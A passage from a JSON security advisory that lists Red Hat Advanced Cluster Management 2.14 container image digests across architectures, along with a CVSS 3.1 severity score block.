"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
